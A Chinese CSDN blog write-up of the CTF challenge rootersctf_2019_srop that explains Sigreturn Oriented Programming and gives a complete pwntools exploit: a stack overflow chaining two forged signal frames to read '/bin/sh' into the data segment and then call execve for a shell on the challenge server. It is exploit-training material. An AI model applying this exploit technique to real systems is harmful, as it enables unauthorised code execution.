srop学习:【rootersctf_2019_srop】

已于 2022-03-24 20:21:04 修改
阅读量5.5k 收藏 6
点赞数 7
分类专栏: buuctf刷题 文章标签: 安全 pwn linux
于 2022-03-24 20:17:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51055545/article/details/123493545
版权

最近学习了一些srop的一些知识,这里通过一道题目来加深一下对srop的运用。

文章目录

1.srop的简单介绍

这里推荐大家一篇文章srop
SROP全称为Sigreturn Oriented Programming,其攻击核心为通过伪造一个‘Signal Frame’(以下简称sigFrame)在栈上,同时触发sigreturn系统调用,让内核为我们恢复一个sigFrame所描述的进程,如一个shell、一个wrtie系统调用打印栈地址等,同时通过对sigFrame中rsp和rip的修改,连接多个sigFrame,可通过多次触发sigreturn系统调用,依次恢复多个sigFrame,实现不同的功能,构成SROP攻击。一个sigFrame可理解为一个进程被挂起时,用于保存进程的数据结构,当进程恢复时,通过触发sigreturn来恢复sigFrame,从而恢复一个进程。

SROP漏洞之所以能构成利用,是因为内核挂起某进程时保存的sigFrame和内核恢复某进程还原sigFrame的两个sigFrame,通过对栈指针寄存器sp的控制,不一致,从而还原出一个攻击者想要的进程。

srop也是通过这样的方式来攻击目标靶机从而get shell或读取flag的.

2.rootersctf_2019_srop题目

例行检查

在这里插入图片描述
64位程序,栈不可执行。

漏洞分析

在这里插入图片描述
函数的主逻辑:
在这里插入图片描述
可以看到汇编语言可供我们用的代码段不是很多,但注意到存在pop_rax_ret,可以控制rax,结合syscall来进行系统调用,这道题目为静态链接,所以我们不能返回libc来算地址,程序中也不存在system,binsh,我们可以利用srop来构造出一个伪造的栈空间,当系统调用sigreturn后,会利用栈上的数据恢复出一个进程,我们这里就可以构造出一个恶意进程。

思路

1.通过在栈上布局好我们的payload,调用完sigreturn后,让内核为我们恢复出一个read(),
2.我们通过read()将binsh读到data段(因为程序可利用的太少,我们考虑使用data段)
3.之后再通过srop来恢复出一个execv(),从而get shell.

exp分析

调用read():

syscall = 0x401033
main = 0x401000
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = 0x402000 #data
frame.rdx = 0x100
frame.rip = syscall
frame.rbp = 0x402000 + 0x20 #设置一个buf大小,进而再次栈溢出

io.recvuntil('?')

payload = 'A'*0x88
payload += p64(0x401032)#pop_rax
payload += p64(0xf)   #15号调用
payload += str(frame)

gdb.attach(io)
io.sendline(payload)

在这里插入图片描述
系统调用sigreturn,之后会为我们恢复出read().
在这里插入图片描述
binsh地址有了,
在这里插入图片描述

接下来我们就进行execv()的构造,

frame = SigreturnFrame()
frame.rax = 0x3b
frame.rdi = 0x402000
frame.rsi = 0x0
frame.rdx = 0x0
frame.rip = 0x401033
payload = '/bin/sh\x00'
payload = payload.ljust(0x28,'A')
payload += p64(0x401032)
payload += p64(0xf)
payload += str(frame)

io.sendline(payload)

在这里插入图片描述
构造好的三个参数,从而get shell.

完整exp
from pwn import *
elf = ELF('./rootersctf_2019_srop')
io = remote('node4.buuoj.cn',29654)
#io = process('./rootersctf_2019_srop')
libc = elf.libc
context.log_level='debug'
context.arch ='amd64'

syscall = 0x401033
main = 0x401000
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = 0x402000 #data
frame.rdx = 0x100
frame.rip = syscall
frame.rbp = 0x402000 + 0x20

io.recvuntil('?')

payload = 'A'*0x88
payload += p64(0x401032)#pop_rax
payload += p64(0xf)
payload += str(frame)


io.sendline(payload)

frame = SigreturnFrame()
frame.rax = 0x3b
frame.rdi = 0x402000
frame.rsi = 0x0
frame.rdx = 0x0
frame.rip = 0x401033
payload = '/bin/sh\x00'
payload = payload.ljust(0x28,'A')
payload += p64(0x401032)
payload += p64(0xf)
payload += str(frame)
#gdb.attach(io)

io.sendline(payload)

io.interactive()

在这里插入图片描述
喜提flag!!!

Leee333
关注
  • 7
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
csapplab:学习csapp
04-04
3.28-4.4第一周学习总结: 虽然提纲上让先写csapplab,但上周日csapplab做了一下午,就写了3道,还都得找资料,看别人的思路,难顶。。。 然后这周还是将重点放在了ctf上,不过效率还挺高的,嘿嘿,学了泄露libc的...
随机舍入工具箱:MATLAB 工具箱,用于 IEEE 754 浮点算法中的随机舍入基本算术运算。-matlab开发
06-01
健壮的界面* srop:对上述所有内容进行参数检查。 3. 实用功能* twosum:增广求和 [Alg. 4.4, 2] * twoprodfma:增强产品 [Alg. 4.8,2] 1. 中的函数不检查输入参数,因此效率更高但鲁棒性较差。 2. 中的接口检查...
srop学习 rootersctf_2019_srop
weixin_46521144的博客
10-12 496
rootersctf_2019_srop 前置知识 这里有必要讲一下什么是srop。ctf_wiki的描述 这里我也简单说一下我的理解。就是内核处理信号(软中断)的时候,会将寄存器压栈到用户地址空间(这里有点小疑惑,因为内核切换进程的时候压栈是属于到内核地址空间,这里是用户地址空间)然后切换回来的时候,调用rt_sigreturnpop回来之前保存的寄存器等。那么我们只要拥有这个gardet,就可以控制程序执行流以及次奥用的系统调用的参数。而触发pop这些寄存器的方法就是直接调用这个rt_sigreturn
rootersctf_2019_srop
z1r0的博客
03-10 282
rootersctf_2019_srop 查看保护 栈溢出,这一题没有放libc但是有pop rax syscall leave ret所以可以直接使用srop来解决 攻击思路:两次srop 1.构造read(0, data_addr, 0x400)来读入/bin/sh 2.有了/bin/sh之后使用execve这个函数来执行execve("/bin/sh", 0, 0);使得可以getshell 溢出的大小的话buf为0x80所以64位下就是0x88。具体的srop可以看ctf-wiki 这里的dat
BUUCTF rootersctf_2019_srop
zwb2603096342的博客
07-08 268
ctf高阶rop中srop的简单运用
SROP三连击(ciscn_2019_es_7、rootersctf_2019_srop、360chunqiu2017_smallest)
huzai9527的博客
03-25 446
SROP】ciscn_2019_es_7 1. ida 分析 vuln有两个函数,read、write;read函数存在栈溢出,write能够泄露栈上的地址 存在sigreturn的调用 2. 思路 首先泄露栈上的返回地址,然后通过gdb调试,输入的参数与返回地址的偏移 有了参数地址,站地址-偏移,就可以输入/bin/sh且得到它的地址 有了/bin/sh、栈地址、sigreturn、syscall就可以使用SROP 3. exp from pwn import * #p = proces
BUUCTF ciscn_2019_s_3
zwb2603096342的博客
07-11 1087
ret2csu,gdb查找stack,srop的利用
buuoj Pwn writeup 156-160
yongbaoii的博客
05-28 394
156 就是64位orw的shellcode 说的很明白 # -*- coding: utf-8 -*- from pwn import * context.log_level = "debug" context.arch = "amd64" r = remote("node3.buuoj.cn",29063) #r = process("./pwnn") shellcode = shellcraft.open('./flag') shellcode += shellcraft.read(3,0x4
PWN练习---Stack_1
qq_74259765的博客
06-25 1311
ctf--PWN方向一些做题经历wp
hitcon_2018_children_tcache(UNsortattack,chunk extend,house of orange,srop)
weixin_61283545的博客
09-02 173
复现了一下师傅的exp这个题目的关键在于strcpy会溢出\x00我们就要利用它来清空chunk2的prev位达到chunk extend的效果,值得注意的是这道题free的时候指针是被清空了的注意每次malloc后的id,比如在循环阶段abac型构造的堆段,我们free a,b之后作为unsortbin的a和铺垫的bin的b被free后,我们id 0,1的chunk也就消失了,所以我们循环清空prev时申请回来的id是0,相同的原理我们最后才能构造一个double c同时指向一个堆段。
linux 栈溢出
sky123博客
02-01 3767
栈基础知识 栈结构 函数调用过程 32位为例: KaTeX parse error: No such environment: align* at position 8: \begin{̲a̲l̲i̲g̲n̲*̲}̲ & \text{push a… 函数参数传递 32位程序 普通函数传参:参数基本都压在栈上(有寄存器传参的情况,可查阅相关资料)。 syscall传参:eax对应系统调用号,ebx、ecx、edx、esi、edi、ebp分别对应前六个参数多余的参数压在栈上。 64位程序: 普
MSE.zip_MSE-SROP_carrier_carrier mse_matlab mse_ofdm
09-24
标题"MSE.zip_MSE-SROP_carrier_carrier mse_matlab mse_ofdm"涉及到的主要知识点是关于无线通信中的误差性能评估,特别是针对正交频分复用(OFDM)系统。描述提到的是一个基于平均平方误差(Mean Square Error,MSE...
信息安全_数据安全_eu-16-Sullivan-Towards-A-Policy-.pdf
08-22
攻击与防御之间的军备竞赛仍在继续,各种新的攻击技术如ROP、SROP、JIT-ROP等不断出现,而防御策略也相应地发展出CFI、ROPGuard、BinCFI等一系列工具。尽管如此,寻找一种既实用又安全的解决方案仍然是一个挑战,这...
带exp的pwn测试文件
09-12
本主题的“带exp的pwn测试文件”是指一系列用于测试和学习漏洞利用技术的文件,其中“exp”代表exploit,即漏洞利用程序。这些文件涵盖了多种经典的漏洞利用技术,如ret2text、ret2syscall、ret2shellcode、ret2libc...
网络战时代的国家安全:策略、技术和国际合作
最新发布
2301_79955948的博客
07-24 1294
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
哪个邮箱最安全最好用啊
Zoho_Mail的博客
07-23 1375
Zoho企业邮箱,采用加密技术、反垃圾邮件和病毒保护,支持多因素认证,确保数据安全合规,同时提供易用性集成和移动应用。对公司,电子邮件可能带上商业计划、顾客信息、财务报表等保密信息,泄露可能导致竞争者掌握,危害企业的竞争优势与信誉。邮件炸弹进攻:很多垃圾短信的涌入可能导致邮箱服务器负荷,危害工作邮件的接收和推送,进而影响业务运作。登陆凭据、医疗记录、专利等敏感信息,一旦泄露,可能对个人或企业导致不可逆转的伤害。遵守国际安全标准和法规,如GDPR、HIPAA等,保证用户数据的合法处理和保护。
【技术升级】Docker环境下Nacos平滑升级攻略,安全配置一步到位
IT后浪的博客
07-23 571
目前项目当中使用的Nacos版本为2.0.2,该版本可能存在一定的安全风险。软件的安全性是一个持续关注的问题,尤其是对于像Nacos这样的服务发现与配置管理平台,它在微服务架构中扮演着核心角色。随着新版本的发布,开发团队会修复已知的安全漏洞,并增强系统的整体安全性。因此要及时升级Nacos,避免因为安全问题,对项目造成影响。
如何安全的申请SSL证书
2401_86337938的博客
07-22 1534
DV级别的证书只验证域名所有权,OV级别证书除了验证域名所有权外还会验证单位组织信息,EV级别的证书除了验证域名所有权、单位组织信息外还会验证详细组织业务信息。一旦你的证书被批准,你会收到一个包含证书文件的邮件。最后,在选择SSL证书时,也要注意选择受信任的可信根CA颁布的SSL证书,可以先向JoySSL官网工作人员发送自己需要保护的域名,提交自己所需要的证书类型,注册时填写。首先选择在授权的JoySSL提供商或者是受信任的证书颁发机构选择适合的证书类型。详细的公司信息验证,用于银行、电商等敏感行业。
告诉我SROP的原理及利用方法
03-29
SROP(Sigreturn-oriented programming)是一种利用信号处理程序返回(sigreturn)操作来执行攻击代码的技术。 当进程捕获一个信号时,内核会保存当前进程的状态(寄存器状态、堆栈等)并跳转到信号处理程序的地址。在信号处理程序结束后,内核会从保存的状态中恢复进程的状态并继续执行。攻击者可以通过构造特定的信号处理程序返回操作,来修改进程的寄存器状态、堆栈等,从而实现控制进程执行攻击代码的目的。 SROP攻击通常需要满足以下条件: 1. 目标进程必须存在一个可用于触发信号处理程序的信号。 2. 攻击者需要知道信号处理程序的地址。 3. 攻击者需要知道信号处理程序返回操作的系统调用号。 利用SROP攻击可以实现各种攻击目的,例如执行shellcode、绕过ASLR、ROP等。 SROP攻击的防御措施包括: 1. 禁用不必要的信号处理程序。 2. 限制信号处理程序的权限。 3. 检测异常的信号处理程序返回操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值